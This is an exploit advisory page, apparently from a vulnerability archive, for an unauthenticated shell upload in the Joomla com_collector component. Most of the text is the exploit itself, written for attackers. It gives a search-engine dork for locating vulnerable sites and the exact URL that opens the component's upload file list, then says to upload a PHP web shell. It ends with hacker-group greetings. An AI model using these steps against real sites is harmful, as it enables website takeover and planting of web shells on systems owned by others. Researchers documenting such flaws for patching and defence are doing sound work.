Joomla Collector Shell Upload

2013.01.21
Credit: Red Dragon_al
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: inurl:index.php?option=com_collector

# Exploit Title:Joomla com_collecter shell upload # Author: Red Dragon_al (Alb0zZ Team) # Home :HackForums.AL,alb0zz.in # Date :19/01/2013 # Category:: web apps # Google dork: [inurl:index.php?option=com_collector] # Tested on: Windows XP # Download: http://www.steevo.fr/en/download # Home Page: http://www.steevo.fr/ --------------------------------------- # ~ Expl0itation ~ # --------------------------------------- 1- Google dork: [inurl:index.php?option=com_collector] 2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 upload ur shell as : shell.php # Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends. #2013

References:

http://www.steevo.fr/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top